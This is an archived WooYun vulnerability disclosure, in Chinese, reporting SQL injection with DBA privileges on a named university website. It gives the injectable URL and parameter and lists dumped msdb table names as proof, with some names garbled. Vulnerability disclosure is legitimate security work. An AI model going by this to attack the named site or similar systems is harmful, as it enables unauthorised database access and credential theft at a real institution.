乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-30: 细节已通知厂商并且等待厂商处理中 2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开
博学厚德 尚美健行
注入点:
http://jwc.synu.edu.cn/website/newstemplate/newsallcontent.jsp?newsId=160428111751
具有DBA权限:
可直接查看数据库用户密码:
数据库:
简单跑一个数据库表作为危害证明:
Database: msdb[77 tables]+-----------------------------+| dbl.RTblOLPProps || dbl.sysdbmaintplans || RTbjPropDefs || RTblClassDefs || RTblDBMProps || RTblDBXProps || RTblDSSProps || RTblDTMProps || RTblDatabaseVersion || RTblEQMProps || RTblEnumerationDef || RTblEnumerationValueDef || RTblGENProps || RTblIfaceDefs || RTblIfaceHier || RTblIfaceMem || RTblMDSProps || RTblNamedObj || RTblParameterDef || RTblProps || RTblRelColDefs || RTblRelshipDefs || RTblRelships || RTblSIMProps || RTblScriptDefs || RTblSites || RTblSumInfo || RTblTFMProps || RTblTypeInfo || RTblTypeLibs || RTblUMLProps || RTblUMXProps || RTblVersionAdminInfo || RTblVersions || RTblWorkspaceItems || @bo.restorefi`d || d`o.RTblRelship@rops || dbl.systargetse`vergroups || sysjob`teps || backupfile || backupmediafamily || backupmediaset || backupset || log_shipping_primaries || log_shipping_secondaries || logmarkhistory || mswebtasks || restorefilegroup || restorehistory || sqlagent_info || sysalerts || syscachedcredentials || syscategories || sysconstraints || sysctstaskkog || sysdbmaintplan_databases || sysdbmaintplan_history || sysdbmaintplan_jobs || sysdownloadlist || sysdsrpackag@s || sysdtscategories || sysdtspackagelog || sysdtssteplog || sysjobhistory || sysjobs || sysjobs_view || sysjobschedules || sysjobservers || sysnotifications || sysoperators || sysraskids || syssegments || systargetserters_view || systargetservergroulmembers || systargetservers || systasks || systasks_view |+-----------------------------+
过滤希望学校的网站越来越安全!
危害等级:无影响厂商忽略
忽略时间:2016-05-09 09:00
漏洞Rank:4 (WooYun评价)
暂无